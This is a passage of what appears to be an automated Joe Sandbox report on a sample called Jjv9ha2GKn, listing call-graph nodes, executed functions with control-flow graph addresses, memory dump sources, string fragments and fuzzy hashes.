74718 5b95d89 CreateWindowExW 74716->74718 74719 5b90230 CreateWindowExW 74716->74719 74717 7af1e2c 74717->74585 74718->74717 74719->74717 74721 7af1d75 74720->74721 74723 5b95d89 CreateWindowExW 74721->74723 74724 5b90230 CreateWindowExW 74721->74724 74722 7af1e2c 74722->74585 74723->74722 74724->74722 74726 7af1d75 74725->74726 74728 5b95d89 CreateWindowExW 74726->74728 74729 5b90230 CreateWindowExW 74726->74729 74727 7af1e2c 74727->74585 74728->74727 74729->74727 74731 7af1d75 74730->74731 74733 5b95d89 CreateWindowExW 74731->74733 74734 5b90230 CreateWindowExW 74731->74734 74732 7af1e2c 74732->74585 74733->74732 74734->74732 74736 7af1d75 74735->74736 74738 5b95d89 CreateWindowExW 74736->74738 74739 5b90230 CreateWindowExW 74736->74739 74737 7af1e2c 74737->74585 74738->74737 74739->74737 74741 7af1d75 74740->74741 74743 5b95d89 CreateWindowExW 74741->74743 74744 5b90230 CreateWindowExW 74741->74744 74742 7af1e2c 74742->74585 74743->74742 74744->74742 74746 7af1d75 74745->74746 74748 5b95d89 CreateWindowExW 74746->74748 74749 5b90230 CreateWindowExW 74746->74749 74747 7af1e2c 74747->74585 74748->74747 74749->74747 74751 7af1d78 74750->74751 74751->74750 74753 5b95d89 CreateWindowExW 74751->74753 74754 5b90230 CreateWindowExW 74751->74754 74752 7af1e2c 74752->74585 74753->74752 74754->74752 74756 7af1d75 74755->74756 74758 5b95d89 CreateWindowExW 74756->74758 74759 5b90230 CreateWindowExW 74756->74759 74757 7af1e2c 74757->74585 74758->74757 74759->74757 74761 7af1d75 74760->74761 74763 5b95d89 CreateWindowExW 74761->74763 74764 5b90230 CreateWindowExW 74761->74764 74762 7af1e2c 74762->74585 74763->74762 74764->74762 74766 7af1d75 74765->74766 74768 5b95d89 CreateWindowExW 74766->74768 74769 5b90230 CreateWindowExW 74766->74769 74767 7af1e2c 74767->74585 74768->74767 74769->74767 74771 7af1d75 74770->74771 74773 5b95d89 CreateWindowExW 74771->74773 74774 5b90230 CreateWindowExW 74771->74774 74772 7af1e2c 74772->74585 74773->74772 74774->74772 74776 7af1d75 74775->74776 74778 5b95d89 CreateWindowExW 74776->74778 74779 5b90230 CreateWindowExW 74776->74779 74777 7af1e2c 74777->74585 74778->74777 74779->74777 74781 7af1d75 74780->74781 74783 5b95d89 CreateWindowExW 74781->74783 74784 5b90230 CreateWindowExW 74781->74784 74782 7af1e2c 74782->74585 74783->74782 74784->74782 74786 7af1d75 74785->74786 74788 5b95d89 CreateWindowExW 74786->74788 74789 5b90230 CreateWindowExW 74786->74789 74787 7af1e2c 74787->74585 74788->74787 74789->74787 74791 7af1d75 74790->74791 74793 5b95d89 CreateWindowExW 74791->74793 74794 5b90230 CreateWindowExW 74791->74794 74792 7af1e2c 74792->74585 74793->74792 74794->74792 74796 7af1d75 74795->74796 74798 5b95d89 CreateWindowExW 74796->74798 74799 5b90230 CreateWindowExW 74796->74799 74797 7af1e2c 74797->74585 74798->74797 74799->74797 74801 7af1d75 74800->74801 74803 5b95d89 CreateWindowExW 74801->74803 74804 5b90230 CreateWindowExW 74801->74804 74802 7af1e2c 74802->74585 74803->74802 74804->74802 74806 7af1d75 74805->74806 74808 5b95d89 CreateWindowExW 74806->74808 74809 5b90230 CreateWindowExW 74806->74809 74807 7af1e2c 74807->74585 74808->74807 74809->74807 74811 7af1d75 74810->74811 74813 5b95d89 CreateWindowExW 74811->74813 74814 5b90230 CreateWindowExW 74811->74814 74812 7af1e2c 74812->74585 74813->74812 74814->74812 74816 7af1d75 74815->74816 74818 5b95d89 CreateWindowExW 74816->74818 74819 5b90230 CreateWindowExW 74816->74819 74817 7af1e2c 74817->74585 74818->74817 74819->74817 74822 5b9023b 74820->74822 74821 5b96089 74821->74627 74822->74821 74830 5b9a769 74822->74830 74835 5b9a778 74822->74835 74827 5b95dc3 74825->74827 74826 5b96089 74826->74627 74827->74826 74828 5b9a769 CreateWindowExW 74827->74828 74829 5b9a778 CreateWindowExW 74827->74829 74828->74826 74829->74826 74831 5b9a799 74830->74831 74832 5b9a7bd 74831->74832 74840 5b9a928 74831->74840 74844 5b9a922 74831->74844 74832->74821 74836 5b9a799 74835->74836 74837 5b9a7bd 74836->74837 74838 5b9a928 CreateWindowExW 74836->74838 74839 5b9a922 CreateWindowExW 74836->74839 74837->74821 74838->74837 74839->74837 74841 5b9a935 74840->74841 74842 5b9a96f 74841->74842 74848 5b99480 74841->74848 74842->74832 74845 5b9a935 74844->74845 74846 5b99480 CreateWindowExW 74845->74846 74847 5b9a96f 74845->74847 74846->74847 74847->74832 74849 5b9948b 74848->74849 74851 5b9b688 74849->74851 74852 5b9ac84 74849->74852 74851->74851 74853 5b9ac8f 74852->74853 74854 5b90230 CreateWindowExW 74853->74854 74855 5b9b6f7 74854->74855 74859 5b9d050 74855->74859 74865 5b9d038 74855->74865 74856 5b9b731 74856->74851 74861 5b9d081 74859->74861 74862 5b9d182 74859->74862 74860 5b9d08d 74860->74856 74861->74860 74871 5b9e177 74861->74871 74876 5b9e188 74861->74876 74862->74856 74867 5b9d182 74865->74867 74868 5b9d081 74865->74868 74866 5b9d08d 74866->74856 74867->74856 74868->74866 74869 5b9e188 CreateWindowExW 74868->74869 74870 5b9e177 CreateWindowExW 74868->74870 74869->74867 74870->74867 74872 5b9e188 74871->74872 74873 5b9e262 74872->74873 74881 5b9f060 74872->74881 74884 5b9f05a 74872->74884 74877 5b9e1b3 74876->74877 74878 5b9e262 74877->74878 74879 5b9f05a CreateWindowExW 74877->74879 74880 5b9f060 CreateWindowExW 74877->74880 74879->74878 74880->74878 74887 5b9d3f8 74881->74887 74885 5b9f095 74884->74885 74886 5b9d3f8 CreateWindowExW 74884->74886 74885->74873 74886->74885 74888 5b9f0b0 CreateWindowExW 74887->74888 74890 5b9f1d4 74888->74890

                                                                                                            Executed Functions

                                                                                                            Function 026F89F8 Relevance: 12.2, Strings: 9, Instructions: 905COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                            • API String ID: 0-99275883
                                                                                                            • Opcode ID: 8c5f98ccddf9c6cf7b69085e8180b9ac15fa6aff1ebebded404bbb3b5f834b0f
                                                                                                            • Instruction ID: dc0aaf9252f5edf95f07aac85aff1d82c9d6098447e715d4de91c716032c0283
                                                                                                            • Opcode Fuzzy Hash: 8c5f98ccddf9c6cf7b69085e8180b9ac15fa6aff1ebebded404bbb3b5f834b0f
                                                                                                            • Instruction Fuzzy Hash: A2823731A012099FCF55CF68C984AAEBBF2FF89314F158599E6099B2A5D730ED81CB50
                                                                                                            Function 07AFAA24 Relevance: 11.0, Strings: 8, Instructions: 957COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 808 7afaa24-7afdee7 811 7afdeed-7afdef3 808->811 812 7afe095-7afe0e6 808->812 813 7afdef5-7afdefc 811->813 814 7afdf34-7afdf48 811->814 836 7afe0e8-7afe0f5 812->836 837 7afe100-7afe11a 812->837 816 7afdefe-7afdf0b 813->816 817 7afdf16-7afdf2f call 7afd960 813->817 818 7afdf6a-7afdf73 814->818 819 7afdf4a-7afdf4e 814->819 816->817 817->814 820 7afdf8d-7afdfa9 818->820 821 7afdf75-7afdf82 818->821 819->818 822 7afdf50-7afdf5c 819->822 834 7afdfaf-7afdfba 820->834 835 7afe051-7afe075 820->835 821->820 822->818 830 7afdf5e-7afdf64 822->830 830->818 843 7afdfbc-7afdfc2 834->843 844 7afdfd2-7afdfd9 834->844 849 7afe07f 835->849 850 7afe077 835->850 836->837 851 7afe11c-7afe123 837->851 852 7afe161-7afe168 837->852 845 7afdfc6-7afdfc8 843->845 846 7afdfc4 843->846 847 7afdfed-7afe010 call 7af9754 844->847 848 7afdfdb-7afdfe5 844->848 845->844 846->844 865 7afe012-7afe01f 847->865 866 7afe021-7afe032 847->866 848->847 849->812 850->849 856 7afe13d-7afe152 851->856 857 7afe125-7afe132 851->857 853 7afe16a-7afe177 852->853 854 7afe182-7afe18b 852->854 853->854 860 7afe18d-7afe18f 854->860 861 7afe191-7afe194 854->861 856->852 868 7afe154-7afe15b 856->868 857->856 867 7afe195-7afe199 860->867 861->867 865->866 873 7afe03f-7afe04b 865->873 866->873 874 7afe034-7afe037 866->874 870 7afe1a1-7afe1a6 867->870 868->852 871 7afe1ef-7afe21a call 7af60f8 868->871 875 7afe1e9-7afe1ec 870->875 876 7afe1a8-7afe1af 870->876 887 7afe221-7afe282 call 7af60f8 871->887 873->834 873->835 874->873 877 7afe1c9-7afe1de 876->877 878 7afe1b1-7afe1be 876->878 877->875 885 7afe1e0-7afe1e7 877->885 878->877 885->875 885->887 895 7afe29a-7afe2a0 887->895 896 7afe284-7afe297 887->896 897 7afe2a2-7afe2a9 895->897 898 7afe310-7afe368 895->898 900 7afe36f-7afe3c7 897->900 901 7afe2af-7afe2bf 897->901 898->900 905 7afe3ce-7afe4dc 900->905 901->905 906 7afe2c5-7afe2c9 901->906 948 7afe52e-7afe586 905->948 949 7afe4de-7afe4ee 905->949 909 7afe2cc-7afe2ce 906->909 912 7afe2f3-7afe2f5 909->912 913 7afe2d0-7afe2e0 909->913 914 7afe2f7-7afe301 912->914 915 7afe304-7afe30d 912->915 921 7afe2cb 913->921 922 7afe2e2-7afe2f1 913->922 921->909 922->912 922->921 952 7afe58d-7afe69a 948->952 949->952 953 7afe4f4-7afe4f8 949->953 987 7afe69c-7afe6af 952->987 988 7afe6b2-7afe6b8 952->988 954 7afe4fb-7afe4fd 953->954 956 7afe4ff-7afe50f 954->956 957 7afe511-7afe513 954->957 956->957 965 7afe4fa 956->965 960 7afe515-7afe51f 957->960 961 7afe522-7afe52b 957->961 965->954 989 7afe6ba-7afe6c1 988->989 990 7afe732-7afe78a 988->990 992 7afe6c7-7afe6cb 989->992 993 7afe791-7afe7e9 989->993 990->993 994 7afe6d1-7afe6d5 992->994 995 7afe7f0-7afe8f4 992->995 993->995 997 7afe6d8-7afe6e5 994->997 1040 7afe8f6-7afe8fa 995->1040 1041 7afe950-7afe9a8 995->1041 1004 7afe70a-7afe717 997->1004 1005 7afe6e7-7afe6f7 997->1005 1015 7afe719-7afe723 1004->1015 1016 7afe726-7afe72f 1004->1016 1012 7afe6f9-7afe708 1005->1012 1013 7afe6d7 1005->1013 1012->1004 1012->1013 1013->997 1042 7afe9af-7afea96 1040->1042 1043 7afe900-7afe904 1040->1043 1041->1042 1045 7afe907-7afe914 1043->1045 1050 7afe928-7afe935 1045->1050 1051 7afe916-7afe926 1045->1051 1058 7afe937-7afe941 1050->1058 1059 7afe944-7afe94d 1050->1059 1051->1050 1057 7afe906 1051->1057 1057->1045
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (aq$Haq$Haq$Haq$Haq$Haq$Haq$PH]q
                                                                                                            • API String ID: 0-1363861295
                                                                                                            • Opcode ID: e6c60691020f5e31e8115ac68b163e6f3146d262b1012b19cb1fae24103561c7
                                                                                                            • Instruction ID: 1bf79bc23b38cb0f878c2ebe1b9f50ec55840e14ca7536d9742080969279c39f
                                                                                                            • Opcode Fuzzy Hash: e6c60691020f5e31e8115ac68b163e6f3146d262b1012b19cb1fae24103561c7
                                                                                                            • Instruction Fuzzy Hash: FB62EF717042158FCB08EB78C8946AE7BA7AFC9710F2485A9E51ADB3A5CF34DC06C791
                                                                                                            Function 026F7C20 Relevance: 9.7, Strings: 7, Instructions: 950COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q$(o]q$(o]q$(o]q$,aq$,aq$Haq
                                                                                                            • API String ID: 0-105717579
                                                                                                            • Opcode ID: 4f292fdc64d7b444f6a538691724999403c350126b83de6474f1a3ddd3cf03bb
                                                                                                            • Instruction ID: 95c8cc0c6c6f4959b0e87d9e9800216c2331d7e826398809a1fb74972e6168d8
                                                                                                            • Opcode Fuzzy Hash: 4f292fdc64d7b444f6a538691724999403c350126b83de6474f1a3ddd3cf03bb
                                                                                                            • Instruction Fuzzy Hash: 17827D71A002198FCF55DF69C884AAEBBB6FF88304F1485A9E505EB3A5DB34DD42CB50
                                                                                                            Function 07191548 Relevance: 5.8, Strings: 2, Instructions: 3280COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1561 7191548-7191594 1564 719159a-7191694 1561->1564 1565 719169c-719169e 1561->1565 1564->1565 1566 71916a0-71916a3 1565->1566 1567 71916a5-71916b5 1565->1567 1569 71916e3-7192b22 1566->1569 1571 71916ca-71916e0 1567->1571 1572 71916b7-71916c8 1567->1572 1830 7192b28-7192bb0 1569->1830 1831 71947d3 1569->1831 1571->1569 1572->1569 2211 7192bb6 call 7195761 1830->2211 2212 7192bb6 call 7195770 1830->2212 1833 71947d8-71947ec 1831->1833 1836 71947ee-71947f1 1833->1836 1837 71947f4-71947fc 1833->1837 1836->1837 1838 71947fd-7194811 1837->1838 1839 7194815-719482e 1837->1839 1838->1839 1841 7194870-7194878 1839->1841 1842 7194830-719486e 1839->1842 1843 719487d-71948a4 1841->1843 1842->1841 1845 71948d0-71948e5 1843->1845 1846 71948a6-71948b7 1843->1846 1847 71948b8-71948c4 1845->1847 1848 71948e7-719491c 1845->1848 1846->1847 1847->1843 1850 71948c6-71948ce 1847->1850 1851 719494c-7194960 1848->1851 1852 719491e-7194921 1848->1852 1850->1845 1855 71949bd-71949f0 1851->1855 1856 7194962-7194966 1851->1856 1853 719493c-719494a 1852->1853 1854 7194923-7194938 1852->1854 1853->1851 1854->1853 1859 7192bb9-7192dac 1883 7192db2-7192ea1 1859->1883 1884 7192ea6-7192f94 1859->1884 1905 7192f97-7194521 1883->1905 1884->1905 1905->1833 2177 7194527-7194545 1905->2177 2213 7194547 call 26f636f 2177->2213 2214 7194547 call 26f63c0 2177->2214 2178 719454c-7194662 2178->1833 2190 7194668-719466d 2178->2190 2191 719468c-7194763 2190->2191 2192 719466f-7194687 2190->2192 2191->1833 2207 7194765-7194798 2191->2207 2193 719479e-71947c5 2192->2193 2201 71947cb-71947d2 2193->2201 2207->2193 2211->1859 2212->1859 2213->2178 2214->2178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$@
                                                                                                            • API String ID: 0-149943524
                                                                                                            • Opcode ID: c99e2db1d4cf4fa3656e148da8aa1a2771d17a69e285f7e69735bc1f08c3cca8
                                                                                                            • Instruction ID: 46974c70c39b30ac7bac343b2c87bb0379d3a2c670b91be3581143b0ef355e7e
                                                                                                            • Opcode Fuzzy Hash: c99e2db1d4cf4fa3656e148da8aa1a2771d17a69e285f7e69735bc1f08c3cca8
                                                                                                            • Instruction Fuzzy Hash: 2C538DB0A152688FCB54FF78D98965DBBB1AB85304F8084E9D44CB7380DE386D86CF56
                                                                                                            Function 07151D05 Relevance: 5.5, Instructions: 5511COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2215 7151d05-7151f67 2243 7153fcd-715427b 2215->2243 2244 7151f6d-7152c80 2215->2244 2311 7154281-7155158 2243->2311 2312 7155160-71560fa 2243->2312 2642 7152c86-7152ff8 2244->2642 2643 7153000-7153fc5 2244->2643 2311->2312 2873 7156480-7156493 2312->2873 2874 7156100-7156478 2312->2874 2642->2643 2643->2243 2879 7156ad5-7157967 2873->2879 2880 7156499-7156acd 2873->2880 2874->2873 3262 7157967 call 7159410 2879->3262 3263 7157967 call 71593dd 2879->3263 3264 7157967 call 71593ef 2879->3264 2880->2879 3260 715796d-7157974 3262->3260 3263->3260 3264->3260
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d8851a9465da6000ff6fb14e63139fd181eb9c17eff459cdf77d25c5d49e5da
                                                                                                            • Instruction ID: 027fa97a6965a6c5bf3222a203f04a9c521c0351d0a11081ce30b7d45d4a9edd
                                                                                                            • Opcode Fuzzy Hash: 4d8851a9465da6000ff6fb14e63139fd181eb9c17eff459cdf77d25c5d49e5da
                                                                                                            • Instruction Fuzzy Hash: 5FB31570A15718CFCB58EF38D98966CBBB2BB89300F4089E9D449A7394DB385D85CF46
                                                                                                            Function 07151D30 Relevance: 5.5, Instructions: 5499COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 3265 7151d30-7151f67 3293 7153fcd-715427b 3265->3293 3294 7151f6d-7152c80 3265->3294 3361 7154281-7155158 3293->3361 3362 7155160-71560fa 3293->3362 3692 7152c86-7152ff8 3294->3692 3693 7153000-7153fc5 3294->3693 3361->3362 3923 7156480-7156493 3362->3923 3924 7156100-7156478 3362->3924 3692->3693 3693->3293 3929 7156ad5-7157967 3923->3929 3930 7156499-7156acd 3923->3930 3924->3923 4312 7157967 call 7159410 3929->4312 4313 7157967 call 71593dd 3929->4313 4314 7157967 call 71593ef 3929->4314 3930->3929 4310 715796d-7157974 4312->4310 4313->4310 4314->4310
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 77e9b15f239e196f0a5d339c83fe1a365bc52824eab51974bf786aecb5309434
                                                                                                            • Instruction ID: b6f5ed4f4f290a3ca99f22a1c43a339177552fb8b0d5e521268f423d20630165
                                                                                                            • Opcode Fuzzy Hash: 77e9b15f239e196f0a5d339c83fe1a365bc52824eab51974bf786aecb5309434
                                                                                                            • Instruction Fuzzy Hash: 9FB31570A15718CFCB58EF38D98966CBBB2BB89300F4089E9D449A7394DB385D85CF46
                                                                                                            Function 07B326F8 Relevance: 5.2, Instructions: 5237COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 5553 7b326f8-7b37eb4 call 7b38f9f 6507 7b37eb6 call 7b39650 5553->6507 6508 7b37eb6 call 7b39640 5553->6508 6505 7b37ebc-7b37ec3 6507->6505 6508->6505
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a87dc7c4a15bba82757a5e5dc00fe2e3a763cd5f5b3edb3ca2a6608aa9aa78dd
                                                                                                            • Instruction ID: 0ffa25010c2b78ac95fc57e35c0ea1839b71a8b4d7f22ece89eba959174f7fa0
                                                                                                            • Opcode Fuzzy Hash: a87dc7c4a15bba82757a5e5dc00fe2e3a763cd5f5b3edb3ca2a6608aa9aa78dd
                                                                                                            • Instruction Fuzzy Hash: 39B30870A116198FCB58FF78D98966CBBF2BB88200F4089E9D488A7354DF345D85CF96
                                                                                                            Function 075DB220 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 6509 75db220-75db245 6510 75db24c-75db270 6509->6510 6511 75db247 6509->6511 6512 75db271 6510->6512 6511->6510 6513 75db278-75db294 6512->6513 6514 75db29d-75db29e 6513->6514 6515 75db296 6513->6515 6528 75db4c3-75db4cc 6514->6528 6515->6512 6515->6514 6516 75db49e-75db4b0 6515->6516 6517 75db418-75db430 6515->6517 6518 75db37a-75db38d 6515->6518 6519 75db4b5-75db4be 6515->6519 6520 75db3f6-75db3f9 6515->6520 6521 75db336-75db34e 6515->6521 6522 75db2f0-75db2f8 6515->6522 6523 75db392-75db3c5 call 75d9560 6515->6523 6524 75db3cd 6515->6524 6525 75db2c9-75db2da 6515->6525 6526 75db463-75db496 call 75d47a8 6515->6526 6527 75db2a3-75db2c7 6515->6527 6515->6528 6516->6513 6547 75db443-75db44a 6517->6547 6548 75db432-75db441 6517->6548 6518->6513 6519->6513 6538 75db402-75db413 6520->6538 6545 75db361-75db368 6521->6545 6546 75db350-75db35f 6521->6546 6529 75db2ff-75db30a 6522->6529 6523->6524 6536 75db3d6-75db3f1 6524->6536 6542 75db2dc-75db2ee 6525->6542 6543 75db2fa-75db2fc 6525->6543 6526->6516 6527->6513 6533 75db31d-75db324 6529->6533 6534 75db30c-75db31b 6529->6534 6544 75db32b-75db331 6533->6544 6534->6544 6536->6513 6538->6513 6542->6513 6543->6529 6544->6513 6552 75db36f-75db375 6545->6552 6546->6552 6549 75db451-75db45e 6547->6549 6548->6549 6549->6513 6552->6513
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: e\1$e\1$"*p$"*p
                                                                                                            • API String ID: 0-1513742261
                                                                                                            • Opcode ID: aa09dfd12ef4b7e92ce3ae531b437f33dc3b54520bdea207bdc1c48d9dbba2df
                                                                                                            • Instruction ID: 65637a4ec6253af2afd5342e4b324fe52aadc491c715883812f9a0709a67fa66
                                                                                                            • Opcode Fuzzy Hash: aa09dfd12ef4b7e92ce3ae531b437f33dc3b54520bdea207bdc1c48d9dbba2df
                                                                                                            • Instruction Fuzzy Hash: A881F1B0D05259CFCB24CFAAD9446EEBBF2BF89300F20952AD416BB254E7355A01CF58
                                                                                                            Function 071914E6 Relevance: 4.2, Strings: 1, Instructions: 2974COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 6766 71914e6-7191594 6769 719159a-7191694 6766->6769 6770 719169c-719169e 6766->6770 6769->6770 6771 71916a0-71916a3 6770->6771 6772 71916a5-71916b5 6770->6772 6774 71916e3-7192b22 6771->6774 6776 71916ca-71916e0 6772->6776 6777 71916b7-71916c8 6772->6777 7035 7192b28-7192bb0 6774->7035 7036 71947d3 6774->7036 6776->6774 6777->6774 7416 7192bb6 call 7195761 7035->7416 7417 7192bb6 call 7195770 7035->7417 7038 71947d8-71947ec 7036->7038 7041 71947ee-71947f1 7038->7041 7042 71947f4-71947fc 7038->7042 7041->7042 7043 71947fd-7194811 7042->7043 7044 7194815-719482e 7042->7044 7043->7044 7046 7194870-7194878 7044->7046 7047 7194830-719486e 7044->7047 7048 719487d-71948a4 7046->7048 7047->7046 7050 71948d0-71948e5 7048->7050 7051 71948a6-71948b7 7048->7051 7052 71948b8-71948c4 7050->7052 7053 71948e7-719491c 7050->7053 7051->7052 7052->7048 7055 71948c6-71948ce 7052->7055 7056 719494c-7194960 7053->7056 7057 719491e-7194921 7053->7057 7055->7050 7060 71949bd-71949f0 7056->7060 7061 7194962-7194966 7056->7061 7058 719493c-719494a 7057->7058 7059 7194923-7194938 7057->7059 7058->7056 7059->7058 7064 7192bb9-7192dac 7088 7192db2-7192ea1 7064->7088 7089 7192ea6-7192f94 7064->7089 7110 7192f97-7194521 7088->7110 7089->7110 7110->7038 7382 7194527-7194545 7110->7382 7418 7194547 call 26f636f 7382->7418 7419 7194547 call 26f63c0 7382->7419 7383 719454c-7194662 7383->7038 7395 7194668-719466d 7383->7395 7396 719468c-7194763 7395->7396 7397 719466f-7194687 7395->7397 7396->7038 7412 7194765-7194798 7396->7412 7398 719479e-71947c5 7397->7398 7406 71947cb-71947d2 7398->7406 7412->7398 7416->7064 7417->7064 7418->7383 7419->7383
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: G
                                                                                                            • API String ID: 0-985283518
                                                                                                            • Opcode ID: 0d79b53ecd313e71dff3b6c3b86207f085488ad790c13f5d984dde19e87734e8
                                                                                                            • Instruction ID: cdebfb6bd6bc907a0e29f37a8241bce80db181eb904f2ca7132ed2015c950c78
                                                                                                            • Opcode Fuzzy Hash: 0d79b53ecd313e71dff3b6c3b86207f085488ad790c13f5d984dde19e87734e8
                                                                                                            • Instruction Fuzzy Hash: BA436DB0A146688BCB54FF78D98965DBBB1AB88304F8085E9D44DB3340DE386DC6CF56
                                                                                                            Function 075D3790 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 7548 75d3790-75d37aa 7549 75d37ac 7548->7549 7550 75d37b1-75d385c 7548->7550 7549->7550 7560 75d385f 7550->7560 7561 75d3866-75d3882 7560->7561 7562 75d388b-75d388c 7561->7562 7563 75d3884 7561->7563 7565 75d39fb-75d3a01 7562->7565 7563->7560 7563->7562 7564 75d38ad-75d393d 7563->7564 7563->7565 7566 75d39c4-75d39c8 7563->7566 7567 75d3891-75d38ab 7563->7567 7568 75d3970-75d39af 7563->7568 7585 75d393f-75d394e 7564->7585 7586 75d3950-75d3957 7564->7586 7569 75d39db-75d39e2 7566->7569 7570 75d39ca-75d39d9 7566->7570 7567->7561 7582 75d39b7-75d39bf 7568->7582 7573 75d39e9-75d39f6 7569->7573 7570->7573 7573->7561 7582->7561 7587 75d395e-75d396b 7585->7587 7586->7587 7587->7561
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 6f$6f$$]q
                                                                                                            • API String ID: 0-3010377955
                                                                                                            • Opcode ID: 427c122ad7172a6edc110042838aaa570d877a283e2454b23b65f21420a0ed01
                                                                                                            • Instruction ID: 5a248ad02224648d2511ffaa2796225a821543f3cd5e1e6e3bfe24015a7a3b21
                                                                                                            • Opcode Fuzzy Hash: 427c122ad7172a6edc110042838aaa570d877a283e2454b23b65f21420a0ed01
                                                                                                            • Instruction Fuzzy Hash: 8C71D4B4E01209DFDB54CFA9D5855DEBBB2FF89300F20856AE40AAB354DB345A81CF91
                                                                                                            Function 0719BB25 Relevance: 2.7, Strings: 2, Instructions: 246COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q$Te]q
                                                                                                            • API String ID: 0-3320153681
                                                                                                            • Opcode ID: 24ec86ec18a05d969e088cab8835882675ddc57c20f57cfbb6e031cfa7cb0990
